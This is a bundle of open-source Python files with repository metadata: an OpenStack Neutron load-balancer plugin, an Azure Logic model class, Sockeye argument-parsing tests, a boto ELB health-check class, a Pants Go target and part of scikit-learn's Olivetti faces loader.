    agent_notifiers = {}

    def __init__(self):
        """Initialization for the loadbalancer service plugin."""
        qdbapi.register_models()
        self.service_type_manager = st_db.ServiceTypeManager.get_instance()
        self._load_drivers()

    def _load_drivers(self):
        """Loads plugin-drivers specified in configuration."""
        self.drivers, self.default_provider = service_base.load_drivers(
            constants.LOADBALANCER, self)

        # we're at the point when extensions are not loaded yet
        # so prevent policy from being loaded
        ctx = context.get_admin_context(load_admin_roles=False)
        # stop service in case provider was removed, but resources were not
        self._check_orphan_pool_associations(ctx, self.drivers.keys())

    def _check_orphan_pool_associations(self, context, provider_names):
        """Checks remaining associations between pools and providers.

        If admin has not undeployed resources with provider that was deleted
        from configuration, neutron service is stopped. Admin must delete
        resources prior to removing providers from configuration.
        """
        pools = self.get_pools(context)
        lost_providers = set([pool['provider'] for pool in pools
                              if pool['provider'] not in provider_names])
        # resources are left without provider - stop the service
        if lost_providers:
            msg = _("Delete associated loadbalancer pools before "
                    "removing providers %s") % list(lost_providers)
            LOG.exception(msg)
            raise SystemExit(msg)

    def _get_driver_for_provider(self, provider):
        # Resolve a provider name to its loaded driver instance.
        if provider in self.drivers:
            return self.drivers[provider]

        # raise if not associated (should never be reached)
        raise n_exc.Invalid(_("Error retrieving driver for provider %s") %
                            provider)

    def _get_driver_for_pool(self, context, pool_id):
        # Resolve the driver responsible for the pool's provider.
        pool = self.get_pool(context, pool_id)
        try:
            return self.drivers[pool['provider']]
        except KeyError:
            raise n_exc.Invalid(_("Error retrieving provider for pool %s") %
                                pool_id)

    def get_plugin_type(self):
        return constants.LOADBALANCER

    def get_plugin_description(self):
        return "Neutron LoadBalancer Service Plugin"

    def create_vip(self, context, vip):
        """Create a VIP in the DB, then hand it to the pool's driver."""
        v = super(LoadBalancerPlugin, self).create_vip(context, vip)
        driver = self._get_driver_for_pool(context, v['pool_id'])
        driver.create_vip(context, v)
        return v

    def update_vip(self, context, id, vip):
        """Update a VIP; status defaults to PENDING_UPDATE for the call."""
        if 'status' not in vip['vip']:
            vip['vip']['status'] = constants.PENDING_UPDATE
        old_vip = self.get_vip(context, id)
        v = super(LoadBalancerPlugin, self).update_vip(context, id, vip)
        driver = self._get_driver_for_pool(context, v['pool_id'])
        driver.update_vip(context, old_vip, v)
        return v

    def _delete_db_vip(self, context, id):
        # proxy the call until plugin inherits from DBPlugin
        super(LoadBalancerPlugin, self).delete_vip(context, id)

    def delete_vip(self, context, id):
        """Mark the VIP PENDING_DELETE and ask the driver to remove it."""
        self.update_status(context, ldb.Vip,
                           id, constants.PENDING_DELETE)
        v = self.get_vip(context, id)
        driver = self._get_driver_for_pool(context, v['pool_id'])
        driver.delete_vip(context, v)

    def _get_provider_name(self, context, pool):
        """Return the provider for *pool*, falling back to the default.

        Raises if an explicit provider is unknown, or if no provider was
        requested and no default provider is configured.
        """
        if ('provider' in pool and
            pool['provider'] != attrs.ATTR_NOT_SPECIFIED):
            provider_name = pconf.normalize_provider_name(pool['provider'])
            self.validate_provider(provider_name)
            return provider_name
        else:
            if not self.default_provider:
                raise pconf.DefaultServiceProviderNotFound(
                    service_type=constants.LOADBALANCER)
            return self.default_provider

    def create_pool(self, context, pool):
        """Create a pool, record its provider association, call the driver."""
        provider_name = self._get_provider_name(context, pool['pool'])
        p = super(LoadBalancerPlugin, self).create_pool(context, pool)

        self.service_type_manager.add_resource_association(
            context,
            constants.LOADBALANCER,
            provider_name, p['id'])
        #need to add provider name to pool dict,
        #because provider was not known to db plugin at pool creation
        p['provider'] = provider_name
        driver = self.drivers[provider_name]
        driver.create_pool(context, p)
        return p

    def update_pool(self, context, id, pool):
        """Update a pool; status defaults to PENDING_UPDATE for the call."""
        if 'status' not in pool['pool']:
            pool['pool']['status'] = constants.PENDING_UPDATE
        old_pool = self.get_pool(context, id)
        p = super(LoadBalancerPlugin, self).update_pool(context, id, pool)
        driver = self._get_driver_for_provider(p['provider'])
        driver.update_pool(context, old_pool, p)
        return p

    def _delete_db_pool(self, context, id):
        # proxy the call until plugin inherits from DBPlugin
        # rely on uuid uniqueness:
        with context.session.begin(subtransactions=True):
            self.service_type_manager.del_resource_associations(context, [id])
            super(LoadBalancerPlugin, self).delete_pool(context, id)

    def delete_pool(self, context, id):
        """Mark the pool PENDING_DELETE and ask the driver to remove it."""
        self.update_status(context, ldb.Pool,
                           id, constants.PENDING_DELETE)
        p = self.get_pool(context, id)
        driver = self._get_driver_for_provider(p['provider'])
        driver.delete_pool(context, p)

    def create_member(self, context, member):
        """Create a member in the DB, then hand it to the pool's driver."""
        m = super(LoadBalancerPlugin, self).create_member(context, member)
        driver = self._get_driver_for_pool(context, m['pool_id'])
        driver.create_member(context, m)
        return m

    def update_member(self, context, id, member):
        """Update a member; status defaults to PENDING_UPDATE for the call."""
        if 'status' not in member['member']:
            member['member']['status'] = constants.PENDING_UPDATE
        old_member = self.get_member(context, id)
        m = super(LoadBalancerPlugin, self).update_member(context, id, member)
        driver = self._get_driver_for_pool(context, m['pool_id'])
        driver.update_member(context, old_member, m)
        return m

    def _delete_db_member(self, context, id):
        # proxy the call until plugin inherits from DBPlugin
        super(LoadBalancerPlugin, self).delete_member(context, id)

    def delete_member(self, context, id):
        """Mark the member PENDING_DELETE and ask the driver to remove it."""
        self.update_status(context, ldb.Member,
                           id, constants.PENDING_DELETE)
        m = self.get_member(context, id)
        driver = self._get_driver_for_pool(context, m['pool_id'])
        driver.delete_member(context, m)

    def create_health_monitor(self, context, health_monitor):
        """Create a health monitor in the DB only; drivers are notified
        later when the monitor is associated with a pool."""
        hm = super(LoadBalancerPlugin, self).create_health_monitor(
            context,
            health_monitor
        )
        return hm

    def update_health_monitor(self, context, id, health_monitor):
        """Update a monitor and notify the driver of each associated pool."""
        old_hm = self.get_health_monitor(context, id)
        hm = super(LoadBalancerPlugin, self).update_health_monitor(
            context,
            id,
            health_monitor
        )

        with context.session.begin(subtransactions=True):
            qry = context.session.query(
                ldb.PoolMonitorAssociation
            ).filter_by(monitor_id=hm['id']).join(ldb.Pool)
            for assoc in qry:
                driver = self._get_driver_for_pool(context, assoc['pool_id'])
                driver.update_health_monitor(context, old_hm,
                                             hm, assoc['pool_id'])
        return hm

    def _delete_db_pool_health_monitor(self, context, hm_id, pool_id):
        # proxy the DB-only deletion of a pool/monitor association
        super(LoadBalancerPlugin, self).delete_pool_health_monitor(context,
                                                                   hm_id,
                                                                   pool_id)

    def _delete_db_health_monitor(self, context, id):
        # proxy the DB-only deletion of a health monitor
        super(LoadBalancerPlugin, self).delete_health_monitor(context, id)

    def delete_health_monitor(self, context, id):
        """Delete a monitor after telling each associated pool's driver."""
        with context.session.begin(subtransactions=True):
            hm = self.get_health_monitor(context, id)
            qry = context.session.query(
                ldb.PoolMonitorAssociation
            ).filter_by(monitor_id=id).join(ldb.Pool)
            for assoc in qry:
                driver = self._get_driver_for_pool(context, assoc['pool_id'])
                driver.delete_pool_health_monitor(context,
                                                  hm,
                                                  assoc['pool_id'])
            super(LoadBalancerPlugin, self).delete_health_monitor(context, id)

    def create_pool_health_monitor(self, context, health_monitor, pool_id):
        """Associate a monitor with a pool and notify the pool's driver."""
        retval = super(LoadBalancerPlugin, self).create_pool_health_monitor(
            context,
            health_monitor,
            pool_id
        )
        monitor_id = health_monitor['health_monitor']['id']
        hm = self.get_health_monitor(context, monitor_id)
        driver = self._get_driver_for_pool(context, pool_id)
        driver.create_pool_health_monitor(context, hm, pool_id)
        return retval

    def delete_pool_health_monitor(self, context, id, pool_id):
        """Mark the association PENDING_DELETE and notify the driver."""
        self.update_pool_health_monitor(context, id, pool_id,
                                        constants.PENDING_DELETE)
        hm = self.get_health_monitor(context, id)
        driver = self._get_driver_for_pool(context, pool_id)
        driver.delete_pool_health_monitor(context, hm, pool_id)

    def stats(self, context, pool_id):
        """Return pool statistics from the DB, refreshed from the driver."""
        driver = self._get_driver_for_pool(context, pool_id)
        stats_data = driver.stats(context, pool_id)
        # if we get something from the driver -
        # update the db and return the value from db
        # else - return what we have in db
        if stats_data:
            super(LoadBalancerPlugin, self).update_pool_stats(
                context,
                pool_id,
                stats_data
            )
        return super(LoadBalancerPlugin, self).stats(context,
                                                     pool_id)

    def populate_vip_graph(self, context, vip):
        """Populate the vip with: pool, members, healthmonitors."""
        pool = self.get_pool(context, vip['pool_id'])
        vip['pool'] = pool
        vip['members'] = [self.get_member(context, member_id)
                          for member_id in pool['members']]
        vip['health_monitors'] = [self.get_health_monitor(context, hm_id)
                                  for hm_id in pool['health_monitors']]
        return vip

    def validate_provider(self, provider):
        """Raise ServiceProviderNotFound if *provider* is not loaded."""
        if provider not in self.drivers:
            raise pconf.ServiceProviderNotFound(
                provider=provider, service_type=constants.LOADBALANCER)
|
{
"content_hash": "b9c29e75a905fa9b60e96d52b617e130",
"timestamp": "",
"source": "github",
"line_count": 285,
"max_line_length": 78,
"avg_line_length": 42.80701754385965,
"alnum_prop": 0.6092622950819672,
"repo_name": "citrix-openstack-build/neutron",
"id": "ea7eff3aac6da321fd4563e8ca694febd2978f0a",
"size": "12847",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "neutron/services/loadbalancer/plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6817315"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
}
|
from msrest.serialization import Model
class WorkflowTriggerCallbackUrl(Model):
    """The workflow trigger callback URL.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar value: Gets the workflow trigger callback URL.
    :vartype value: str
    :ivar method: Gets the workflow trigger callback URL HTTP method.
    :vartype method: str
    :ivar base_path: Gets the workflow trigger callback URL base path.
    :vartype base_path: str
    :ivar relative_path: Gets the workflow trigger callback URL relative path.
    :vartype relative_path: str
    :param relative_path_parameters: Gets the workflow trigger callback URL
     relative path parameters.
    :type relative_path_parameters: list of str
    :param queries: Gets the workflow trigger callback URL query parameters.
    :type queries: :class:`WorkflowTriggerListCallbackUrlQueries
     <azure.mgmt.logic.models.WorkflowTriggerListCallbackUrlQueries>`
    """

    # msrest validation map: these attributes are server-populated and
    # read-only (they are ignored when serializing a request).
    _validation = {
        'value': {'readonly': True},
        'method': {'readonly': True},
        'base_path': {'readonly': True},
        'relative_path': {'readonly': True},
    }

    # msrest serialization map: python attribute -> wire key and type.
    _attribute_map = {
        'value': {'key': 'value', 'type': 'str'},
        'method': {'key': 'method', 'type': 'str'},
        'base_path': {'key': 'basePath', 'type': 'str'},
        'relative_path': {'key': 'relativePath', 'type': 'str'},
        'relative_path_parameters': {'key': 'relativePathParameters', 'type': '[str]'},
        'queries': {'key': 'queries', 'type': 'WorkflowTriggerListCallbackUrlQueries'},
    }

    def __init__(self, relative_path_parameters=None, queries=None):
        # Read-only attributes start as None; they are filled in when a
        # server response is deserialized.
        self.value = None
        self.method = None
        self.base_path = None
        self.relative_path = None
        # Client-settable attributes.
        self.relative_path_parameters = relative_path_parameters
        self.queries = queries
|
{
"content_hash": "8449689104faa12a479ea32b5e1757ee",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 87,
"avg_line_length": 39.25,
"alnum_prop": 0.6523354564755839,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "e2d2b9f9b624ab111c080a566dd03725ffb996af",
"size": "2358",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "azure-mgmt-logic/azure/mgmt/logic/models/workflow_trigger_callback_url.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
}
|
import pytest
import sockeye.constants as C
import sockeye.arguments as arguments
import argparse
@pytest.mark.parametrize("test_params, expected_params", [
    # mandatory parameters
    ('--source test_src --target test_tgt '
     '--validation-source test_validation_src --validation-target test_validation_tgt '
     '--output test_output',
     dict(source='test_src', target='test_tgt',
          validation_source='test_validation_src', validation_target='test_validation_tgt',
          output='test_output', overwrite_output=False,
          source_vocab=None, target_vocab=None, use_tensorboard=False, quiet=False)),

    # all parameters
    ('--source test_src --target test_tgt '
     '--validation-source test_validation_src --validation-target test_validation_tgt '
     '--output test_output '
     '--source-vocab test_src_vocab --target-vocab test_tgt_vocab '
     '--use-tensorboard --overwrite-output --quiet',
     dict(source='test_src', target='test_tgt',
          validation_source='test_validation_src', validation_target='test_validation_tgt',
          output='test_output', overwrite_output=True,
          source_vocab='test_src_vocab', target_vocab='test_tgt_vocab', use_tensorboard=True, quiet=True)),

    # short parameters
    ('-s test_src -t test_tgt '
     '-vs test_validation_src -vt test_validation_tgt '
     '-o test_output -q',
     dict(source='test_src', target='test_tgt',
          validation_source='test_validation_src', validation_target='test_validation_tgt',
          output='test_output', overwrite_output=False,
          source_vocab=None, target_vocab=None, use_tensorboard=False, quiet=True))
])
def test_io_args(test_params, expected_params):
    """I/O command-line arguments parse to the expected namespace values."""
    _test_args(test_params, expected_params, arguments.add_io_args)
@pytest.mark.parametrize("test_params, expected_params", [
    # defaults when nothing is given
    ('', dict(device_ids=[-1], use_cpu=False, disable_device_locking=False, lock_dir='/tmp')),
    # every device option overridden
    ('--device-ids 1 2 3 --use-cpu --disable-device-locking --lock-dir test_dir',
     dict(device_ids=[1, 2, 3], use_cpu=True, disable_device_locking=True, lock_dir='test_dir'))
])
def test_device_args(test_params, expected_params):
    """Device command-line arguments parse to the expected values."""
    _test_args(test_params, expected_params, arguments.add_device_args)
@pytest.mark.parametrize("test_params, expected_params", [
    # defaults when nothing is given
    ('', dict(params=None, num_words=50000, num_words_source=None, num_words_target=None, word_min_count=1,
              rnn_num_layers=1, rnn_cell_type=C.LSTM_TYPE, rnn_num_hidden=1024,
              rnn_residual_connections=False, num_embed=512, num_embed_source=None, num_embed_target=None,
              attention_type='mlp', attention_num_hidden=None, attention_coverage_type='count',
              attention_coverage_num_hidden=1,
              lexical_bias=None, learn_lexical_bias=False, weight_tying=False, max_seq_len=100,
              max_seq_len_source=None, max_seq_len_target=None,
              attention_use_prev_word=False, context_gating=False, layer_normalization=False,
              encoder=C.RNN_NAME, conv_embed_max_filter_width=8,
              conv_embed_num_filters=(200, 200, 250, 250, 300, 300, 300, 300),
              conv_embed_num_highway_layers=4, conv_embed_pool_stride=5)),

    # every model option overridden
    ('--params test_params --num-words 10 --num-words-source 11 --num-words-target 12 --word-min-count 10 '
     '--rnn-num-layers 10 --rnn-cell-type gru '
     '--rnn-num-hidden 512 --rnn-residual-connections --num-embed 1024 --num-embed-source 10 --num-embed-target 10 '
     '--attention-type dot --attention-num-hidden 10 --attention-coverage-type tanh '
     '--attention-coverage-num-hidden 10 --lexical-bias test_bias --learn-lexical-bias --weight-tying '
     '--max-seq-len 10 --max-seq-len-source 11 --max-seq-len-target 12 --attention-use-prev-word --context-gating --layer-normalization '
     '--encoder rnn-with-conv-embed --conv-embed-max-filter-width 2 --conv-embed-num-filters 100 100 '
     '--conv-embed-num-highway-layers 2 --conv-embed-pool-stride 2',
     dict(params='test_params', num_words=10, num_words_source=11, num_words_target=12,
          word_min_count=10, rnn_num_layers=10, rnn_cell_type=C.GRU_TYPE,
          rnn_num_hidden=512,
          rnn_residual_connections=True, num_embed=1024, num_embed_source=10, num_embed_target=10,
          attention_type='dot', attention_num_hidden=10, attention_coverage_type='tanh',
          attention_coverage_num_hidden=10,
          lexical_bias='test_bias', learn_lexical_bias=True, weight_tying=True, max_seq_len=10,
          max_seq_len_source=11, max_seq_len_target=12,
          attention_use_prev_word=True, context_gating=True, layer_normalization=True,
          encoder=C.RNN_WITH_CONV_EMBED_NAME, conv_embed_max_filter_width=2, conv_embed_num_filters=[100, 100],
          conv_embed_num_highway_layers=2, conv_embed_pool_stride=2))
])
def test_model_parameters(test_params, expected_params):
    """Model command-line arguments parse to the expected values."""
    _test_args(test_params, expected_params, arguments.add_model_parameters)
@pytest.mark.parametrize("test_params, expected_params", [
    # defaults when nothing is given
    ('', dict(batch_size=64, fill_up='replicate', no_bucketing=False, bucket_width=10, loss=C.CROSS_ENTROPY,
              smoothed_cross_entropy_alpha=0.3, normalize_loss=False, metrics=[C.PERPLEXITY],
              optimized_metric=C.PERPLEXITY,
              max_updates=-1, checkpoint_frequency=1000, max_num_checkpoint_not_improved=8, dropout=0.0,
              optimizer='adam', min_num_epochs=0,
              initial_learning_rate=0.0003, weight_decay=0.0, momentum=None, clip_gradient=1.0,
              learning_rate_scheduler_type='plateau-reduce', learning_rate_reduce_factor=0.5,
              learning_rate_reduce_num_not_improved=3, learning_rate_half_life=10, use_fused_rnn=False,
              rnn_forget_bias=0.0, rnn_h2h_init=C.RNN_INIT_ORTHOGONAL, monitor_bleu=0, seed=13,
              keep_last_params=-1)),

    # every training option overridden
    ('--batch-size 128 --fill-up test_fill_up --no-bucketing --bucket-width 20 --loss smoothed-cross-entropy '
     '--smoothed-cross-entropy-alpha 1.0 --normalize-loss --metrics perplexity accuracy '
     '--optimized-metric bleu --max-updates 10 --checkpoint-frequency 10 --min-num-epochs 10 '
     '--max-num-checkpoint-not-improved 16 --dropout 1.0 --optimizer sgd --initial-learning-rate 1.0 '
     '--weight-decay 1.0 --momentum 1.0 --clip-gradient 2.0 --learning-rate-scheduler-type fixed-rate-inv-t '
     '--learning-rate-reduce-factor 1.0 --learning-rate-reduce-num-not-improved 10 --learning-rate-half-life 20 '
     '--use-fused-rnn --rnn-forget-bias 1.0 --rnn-h2h-init orthogonal_stacked --monitor-bleu 10 --seed 10 '
     '--keep-last-params 50'
     ,
     dict(batch_size=128, fill_up='test_fill_up', no_bucketing=True, bucket_width=20, loss=C.SMOOTHED_CROSS_ENTROPY,
          smoothed_cross_entropy_alpha=1.0, normalize_loss=True, metrics=[C.PERPLEXITY, C.ACCURACY],
          optimized_metric=C.BLEU, min_num_epochs=10,
          max_updates=10, checkpoint_frequency=10, max_num_checkpoint_not_improved=16, dropout=1.0, optimizer='sgd',
          initial_learning_rate=1.0, weight_decay=1.0, momentum=1.0, clip_gradient=2.0,
          learning_rate_scheduler_type='fixed-rate-inv-t', learning_rate_reduce_factor=1.0,
          learning_rate_reduce_num_not_improved=10, learning_rate_half_life=20.0, use_fused_rnn=True,
          rnn_forget_bias=1.0, rnn_h2h_init=C.RNN_INIT_ORTHOGONAL_STACKED, monitor_bleu=10, seed=10,
          keep_last_params=50)),
])
def test_training_arg(test_params, expected_params):
    """Training command-line arguments parse to the expected values."""
    _test_args(test_params, expected_params, arguments.add_training_args)
@pytest.mark.parametrize("test_params, expected_params", [
    # Only --models supplied: every other option takes its default.
    ('--models m1 m2 m3', dict(input=None, output=None, models=['m1', 'm2', 'm3'],
                               checkpoints=None, beam_size=5, ensemble_mode='linear',
                               max_input_len=None, softmax_temperature=None, output_type='translation',
                               sure_align_threshold=0.9)),
    # Every long-form option set explicitly (non-default values).
    ('--input test_input --output test_output --models m1 m2 m3 --checkpoints 1 2 3 --beam-size 10 '
     '--ensemble-mode log_linear --max-input-len 10 --softmax-temperature 1.0 '
     '--output-type translation_with_alignments --sure-align-threshold 1.0',
     dict(input='test_input', output='test_output', models=['m1', 'm2', 'm3'],
          checkpoints=[1, 2, 3], beam_size=10, ensemble_mode='log_linear',
          max_input_len=10, softmax_temperature=1.0,
          output_type='translation_with_alignments', sure_align_threshold=1.0)),
    # Short-form aliases for a subset of the options; the rest default.
    ('-i test_input -o test_output -m m1 m2 m3 -c 1 2 3 -b 10 -n 10',
     dict(input='test_input', output='test_output', models=['m1', 'm2', 'm3'],
          checkpoints=[1, 2, 3], beam_size=10, ensemble_mode='linear',
          max_input_len=10, softmax_temperature=None, output_type='translation', sure_align_threshold=0.9))
])
def test_inference_args(test_params, expected_params):
    """Parse each inference CLI string and compare the resulting namespace."""
    _test_args(test_params, expected_params, arguments.add_inference_args)
def _test_args(test_params, expected_params, args_func):
test_parser = argparse.ArgumentParser()
args_func(test_parser)
parsed_params = test_parser.parse_args(test_params.split())
assert dict(vars(parsed_params)) == expected_params
|
{
"content_hash": "cbed860ec9c6239892b0c522eeccd560",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 137,
"avg_line_length": 62.99315068493151,
"alnum_prop": 0.6700010873110797,
"repo_name": "KellenSunderland/sockeye",
"id": "b4dd0caf302fe278c39a2b5596493c7cb332115c",
"size": "9763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/unit/test_arguments.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "467469"
},
{
"name": "Shell",
"bytes": "1662"
}
],
"symlink_target": ""
}
|
from ipc import vetor

# Generate the list of primes via the shared `vetor` helper and display it.
print(vetor.gera_primos())
|
{
"content_hash": "9db6bab1c3aeb478be74e9b357d6cfcd",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 28,
"avg_line_length": 21.666666666666668,
"alnum_prop": 0.7692307692307693,
"repo_name": "jucimarjr/IPC_2017-1",
"id": "3dbdbe8567627ed06daebe2040fcca2d7889b313",
"size": "697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lista08/lista08_lista02_questao14.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "2978"
},
{
"name": "Python",
"bytes": "525677"
}
],
"symlink_target": ""
}
|
class HealthCheck(object):
    """
    Represents an EC2 Access Point Health Check. See
    :ref:`elb-configuring-a-health-check` for a walkthrough on configuring
    load balancer health checks.
    """

    def __init__(self, access_point=None, interval=30, target=None,
                 healthy_threshold=3, timeout=5, unhealthy_threshold=5):
        """
        :ivar str access_point: Name of the load balancer this health check
            is associated with.
        :ivar int interval: Seconds between consecutive health checks.
        :ivar str target: What to probe on an instance. See the Amazon
            HealthCheck_ documentation for possible Target values.
        :ivar int healthy_threshold: Checks that must succeed before an
            instance is considered healthy.
        :ivar int timeout: Seconds to wait for a probe response.
        :ivar int unhealthy_threshold: Checks that must fail before an
            instance is considered unhealthy.

        .. _HealthCheck: http://docs.amazonwebservices.com/ElasticLoadBalancing/latest/APIReference/API_HealthCheck.html
        """
        self.access_point = access_point
        self.interval = interval
        self.target = target
        self.healthy_threshold = healthy_threshold
        self.timeout = timeout
        self.unhealthy_threshold = unhealthy_threshold

    def __repr__(self):
        return 'HealthCheck:%s' % self.target

    def startElement(self, name, attrs, connection):
        # No nested XML elements to delegate to.
        return None

    def endElement(self, name, value, connection):
        # Response elements carrying integer values, keyed by XML tag name.
        int_fields = {
            'Interval': 'interval',
            'HealthyThreshold': 'healthy_threshold',
            'Timeout': 'timeout',
            'UnhealthyThreshold': 'unhealthy_threshold',
        }
        if name == 'Target':
            self.target = value
        elif name in int_fields:
            setattr(self, int_fields[name], int(value))
        else:
            # Any unrecognized element is stored as a plain string attribute.
            setattr(self, name, value)

    def update(self):
        """
        Apply this instance's health check values to the load balancer
        it was retrieved from.

        .. note:: Does nothing when :py:attr:`access_point` is unset, as is
           the case with a newly instantiated HealthCheck instance.
        """
        if not self.access_point:
            return

        new_hc = self.connection.configure_health_check(self.access_point,
                                                        self)
        self.interval = new_hc.interval
        self.target = new_hc.target
        self.healthy_threshold = new_hc.healthy_threshold
        self.unhealthy_threshold = new_hc.unhealthy_threshold
        self.timeout = new_hc.timeout
|
{
"content_hash": "bbec381b285030c52f629bacfcab0e1c",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 120,
"avg_line_length": 38.43939393939394,
"alnum_prop": 0.6286953094205755,
"repo_name": "Didacti/botornado",
"id": "6661ea15a2523b5a446f2c325cdc5856aea7eb43",
"size": "3641",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "boto/ec2/elb/healthcheck.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1977043"
}
],
"symlink_target": ""
}
|
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from pants.backend.core.wrapped_globs import Globs
from pants.base.address import Address
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TargetDefinitionException
from pants.base.payload import Payload
from pants.contrib.go.targets.go_target import GoTarget
class GoLocalSource(GoTarget):
  """Base class for Go targets whose sources are the *.go files co-located with a BUILD file."""

  @classmethod
  def is_go_source(cls, path):
    """Returns `True` if the file at the given `path` is a go source file."""
    return path.endswith('.go') and os.path.isfile(path)

  @classmethod
  def local_import_path(cls, source_root, address):
    """Returns the Go import path for the given address housed under the given source root.

    :param string source_root: The path of the source root the address is found within.
    :param address: The target address of a GoLocalSource target.
    :type: :class:`pants.base.address.Address`
    :raises: `ValueError` if the address does not reside within the source root.
    """
    return cls.package_path(source_root, address.spec_path)

  @classmethod
  def create(cls, parse_context, **kwargs):
    """Instantiates this target in `parse_context`, deriving its name from the BUILD file dir.

    :raises: `TargetDefinitionException` if an explicit `name` or `sources` is supplied,
      since both are always derived for Go local-source targets.
    """
    if 'name' in kwargs:
      # FIX: original message read "from the the BUILD file location" (doubled word).
      raise TargetDefinitionException(Address(parse_context.rel_path, kwargs['name']).spec,
                                      'A {} does not accept a name; instead, the name is taken '
                                      'from the BUILD file location.'.format(cls.alias()))
    name = os.path.basename(parse_context.rel_path)

    if 'sources' in kwargs:
      raise TargetDefinitionException(Address(parse_context.rel_path, name).spec,
                                      'A {} does not accept sources; instead, it always globs all '
                                      'the *.go sources in the BUILD file\'s '
                                      'directory.'.format(cls.alias()))

    parse_context.create_object(cls, type_alias=cls.alias(), name=name, **kwargs)

  @classmethod
  def alias(cls):
    """Subclasses should return their desired BUILD file alias.

    :rtype: string
    """
    raise NotImplementedError()

  def __init__(self, address=None, payload=None, **kwargs):
    # All *.go files next to the BUILD file constitute this target's sources.
    globs = Globs(rel_path=os.path.join(get_buildroot(), address.spec_path))
    sources = globs('*.go')

    payload = payload or Payload()
    payload.add_fields({
      'sources': self.create_sources_field(sources=sources,
                                           sources_rel_path=address.spec_path,
                                           key_arg='sources'),
    })
    super(GoLocalSource, self).__init__(address=address, payload=payload, **kwargs)

  @property
  def import_path(self):
    """The import path as used in import statements in `.go` source files."""
    return self.local_import_path(self.target_base, self.address)
|
{
"content_hash": "b2aeca52e72b9f0cf604912485d921a3",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 99,
"avg_line_length": 40.513888888888886,
"alnum_prop": 0.6448405896468975,
"repo_name": "kslundberg/pants",
"id": "2b72a4188098c9076c341426edb88a6474149fb9",
"size": "3064",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "contrib/go/src/python/pants/contrib/go/targets/go_local_source.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "767"
},
{
"name": "CSS",
"bytes": "11442"
},
{
"name": "GAP",
"bytes": "2459"
},
{
"name": "Go",
"bytes": "1437"
},
{
"name": "HTML",
"bytes": "70131"
},
{
"name": "Java",
"bytes": "302900"
},
{
"name": "JavaScript",
"bytes": "25075"
},
{
"name": "Protocol Buffer",
"bytes": "3783"
},
{
"name": "Python",
"bytes": "3885765"
},
{
"name": "Scala",
"bytes": "84093"
},
{
"name": "Shell",
"bytes": "49520"
},
{
"name": "Thrift",
"bytes": "2583"
}
],
"symlink_target": ""
}
|
"""Modified Olivetti faces dataset.
The original database was available from (now defunct)
http://www.uk.research.att.com/facedatabase.html
The version retrieved here comes in MATLAB format from the personal
web page of Sam Roweis:
http://www.cs.nyu.edu/~roweis/
There are ten different images of each of 40 distinct subjects. For some
subjects, the images were taken at different times, varying the lighting,
facial expressions (open / closed eyes, smiling / not smiling) and facial
details (glasses / no glasses). All the images were taken against a dark
homogeneous background with the subjects in an upright, frontal position (with
tolerance for some side movement).
The original dataset consisted of 92 x 112, while the Roweis version
consists of 64x64 images.
"""
# Copyright (c) 2011 David Warde-Farley <wardefar at iro dot umontreal dot ca>
# License: Simplified BSD
from os.path import join, exists
from os import makedirs
from cStringIO import StringIO
import urllib2
import numpy as np
from scipy.io.matlab import loadmat
from .base import get_data_home, Bunch
from ..utils import check_random_state
# Download location of the Roweis MATLAB copy of the dataset.
DATA_URL = "http://cs.nyu.edu/~roweis/data/olivettifaces.mat"
# File name of the cached numpy array inside the scikit-learn data home.
TARGET_FILENAME = "olivetti.npy"

# Grab the module-level docstring to use as a description of the
# dataset
MODULE_DOCS = __doc__
def fetch_olivetti_faces(data_home=None, shuffle=False, random_state=0,
download_if_missing=True):
"""Loader for the Olivetti faces data-set from AT&T.
Parameters
----------
data_home : optional, default: None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/scikit_learn_data' subfolders.
shuffle : boolean, optional
If True the order of the dataset is shuffled to avoid having
images of the same person grouped.
download_if_missing: optional, True by default
If False, raise a IOError if the data is not locally available
instead of trying to download the data from the source site.
random_state : optional, integer or RandomState object
The seed or the random number generator used to shuffle the
data.
Notes
------
This dataset consists of 10 pictures each of 40 individuals. The original
database was available from (now defunct)
http://www.uk.research.att.com/facedatabase.html
The version retrieved here comes in MATLAB format from the personal
web page of Sam Roweis:
http://www.cs.nyu.edu/~roweis/
"""
data_home = get_data_home(data_home=data_home)
if not exists(data_home):
makedirs(data_home)
if not exists(join(data_home, TARGET_FILENAME)):
print 'downloading Olivetti faces from %s to %s' % (DATA_URL,
data_home)
fhandle = urllib2.urlopen(DATA_URL)
buf = StringIO(fhandle.read())
mfile = loadmat(buf)
np.save(join(data_home, TARGET_FILENAME), mfile['faces'].T)
faces = mfile['faces'].T.copy()
del mfile
else:
faces = np.load(join(data_home, TARGET_FILENAME))
# We want floating point data, but float32 is enough (there is only
# one byte of precision in the original uint8s anyway)
faces = np.float32(faces)
faces = faces - faces.min()
faces /= faces.max()
faces = faces.reshape((400, 64, 64)).transpose(0, 2, 1)
